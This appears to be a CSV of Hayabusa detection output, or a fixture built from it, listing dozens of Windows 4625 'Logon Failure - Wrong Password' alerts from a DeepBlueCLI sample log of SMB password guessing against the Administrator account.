+2016-09-20 01:51:05.495 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: c8RjXtDnXvCXSJ2w  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:05.532 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 2EdRXJJ1RCl8n9bd  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:05.576 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 8tnwGNp2ncfcBlFL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:05.608 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: iGKEloPpd6CtrSlg  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:05.648 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: LBvHz5iKl0dl97xj  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:05.687 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: A0FPIXCc5FlKMLaL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:05.725 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: c7Li2NqHgSIetZka  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:05.764 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: MuIRFiXBUqrJeMbx  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:05.808 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: zxJNU05FkPwhcYxj  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:05.848 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: TWifHaaBiypAGkKi  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:05.888 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: L9VByeO8vHGSOJK3  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:05.932 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Ns12T94itDDRxYxC  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:05.969 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Z8jplFaHgwrWpFY8  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:06.000 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: fQ9L626fGZQkNC25  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:06.045 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: HfplQ16d7lsObzki  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:06.084 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: c30ILHx5sYZCMflg  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:06.127 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: GMsJKiYmbgbr9wF0  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:06.167 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Q2hpQI6z68MVBzoW  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:06.208 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: iDgzJjXBnWDSVjdg  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:06.252 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 0XU5HdsnM0Lvpvq2  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:06.290 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: pjmtkv6JDb4s2WnR  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:06.328 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: I6mBM2WMWlKkQHZl  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:06.372 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 3jo7coI8uS8JCorc  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:06.406 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 1ao6QcPI3nzpNnHi  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:06.444 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: WkP8vstCEOH9wnUW  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:06.484 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: QzrhcYEue85zhZ8V  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:06.531 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ivpdjGaxoZOCTxbq  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:06.572 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: qIsZXHE4Swkbytiu  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:06.604 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: bdT2bVjtEd6KhQWf  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:06.652 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: RT9Tqp0lf0dd6h9C  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:06.696 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Xwhlrl2ck1o2qTDy  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:06.736 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: lxX2762Fa804981t  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:06.776 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: O55rRqTo9vgwnYoq  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:06.828 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: zo7BzxXZDdykOXoZ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:06.868 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 6YGEMcvYtwNJys39  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:06.908 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: V0xq8et2LwWSgVgk  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:06.956 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 43EK0cGlZBhWRd5B  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:06.996 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: UBoGMdTjWVVVvifn  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:07.038 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: IcCrPXp3VLObGU6v  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:07.080 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: zhZguuPimqAruiTu  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:07.110 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 5o6amdSWFFbueCyp  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:07.152 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: W0wRaNXdhMlIY1HX  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:07.192 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: J8jqrrwWeKZGypW0  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:07.236 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 8LIavw2zakOP4DqU  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:07.275 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: qz7gr4vA633waQ01  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:07.325 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 2TmHz5POLSNJHm2x  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:07.364 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: DcpOxhy2nnLIEGHT  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:07.453 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: gJxfDgfujy5Um2wa  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:07.484 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 217VTq8EbYIDeSXU  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:07.524 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: WPfE1m0tsJAJnRt9  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:07.564 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: OQCfGhvBMSq3PIoa  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:07.608 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: XBl6JIRetWEnjaVx  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:07.650 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: KXJMNnj4LeBIYARt  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:07.680 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: v3sdn9f4xtvcsaHp  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:07.720 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: DWT0NepMYD29cOwh  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:07.764 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: DDb7wV6uzj1tat2d  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:07.806 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: RBcmANUL4a6DFobS  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:07.841 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: VL2swHF9MtnCfnp3  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:07.883 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: E0ZkcAD0IakqSUph  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:07.924 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 5HgksdIGukmliZeE  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:07.966 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: xYoLckmmOWCSf4Q2  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:08.000 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 2PTxr8Zkz2y2XwBo  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:08.044 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: J3caypkIM2XqoSSF  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:08.088 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: yuQOUzJ6sU5AhARR  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:08.128 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: SyM3OrjUHub9k23k  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:08.171 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: vY7SRoWumGQOrljW  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:08.212 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: iFrO2nUMlfeDLGyc  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:08.250 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 9B8Gq7d30U8DqdN0  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:08.292 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: yxSPuxpCHgSo1d1a  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:08.342 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 9elGZ4POExblUCAK  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:08.385 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: XHY9Ig3sqQKNXYqq  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:08.424 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: voMDzTqYqKpfudKo  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
